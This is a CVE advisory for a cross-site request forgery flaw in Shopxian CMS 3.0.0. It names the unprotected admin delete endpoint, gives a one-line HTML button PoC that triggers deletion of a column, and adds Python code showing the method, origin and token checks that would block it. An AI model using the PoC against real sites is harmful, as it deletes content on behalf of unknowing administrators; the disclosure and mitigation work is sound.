CVE-2022-38329: CVE-Issues/file.md at main · albert5888/CVE-Issues
An issue was discovered in Shopxian CMS 3.0.0. There is a CSRF vulnerability that can delete the specified column via index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17.
Cross-site request forgery exists in shopxian_cms
Vendor: https://github.com/zhangqiquan/shopxian_cms
Download link: https://github.com/zhangqiquan/shopxian_cms.git
Vulnerability details: While the administrator is logged in, clicking the button below triggers a plain GET request that deletes the specified column; the endpoint performs no anti-CSRF token or origin check.
Vulnerability POC:
```html
<!-- Navigating the logged-in admin's browser to the delete URL is enough; `input` is a void element, so no closing tag is used -->
<input type="button" onclick="location.href='http://127.0.0.1/index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17'" value="Click Me!!!">
```
CSRF HTML: open the HTML file in the browser and click the button.
Result: the specified column is successfully deleted.
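The root cause is that an authenticated GET performs a destructive action with no check of where the request came from. As an added illustration (not code from shopxian_cms), the Python below shows the three checks a `finderdel`-style handler needs to stop the PoC above: reject GET, verify Origin/Referer, and require a per-session synchronizer token. The session dict, header names and `SITE_ORIGIN` are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Assumed site origin of the CMS (the PoC targets 127.0.0.1).
SITE_ORIGIN = "http://127.0.0.1"


def issue_csrf_token(session: dict) -> str:
    """Generate a per-session synchronizer token; the admin delete form must embed it."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def delete_allowed(method: str, headers: dict, form: dict, session: dict):
    """Decide whether a state-changing delete request may proceed.

    Returns (allowed, reason). The three checks are independent; any one
    of them alone would already block the GET-navigation PoC.
    """
    # 1. A GET must never change state: the PoC works only because the
    #    endpoint deletes on a plain navigation.
    if method.upper() != "POST":
        return False, "state change requires POST"

    # 2. Origin (or Referer as fallback) must be our own site. A request
    #    launched from an attacker's page carries that page's origin, or none.
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False, "missing Origin/Referer"
    parsed = urlparse(src)
    if f"{parsed.scheme}://{parsed.netloc}" != SITE_ORIGIN:
        return False, "cross-site origin"

    # 3. Synchronizer token bound to the logged-in session, compared in
    #    constant time so the check itself leaks nothing.
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "bad or missing CSRF token"

    return True, "ok"
```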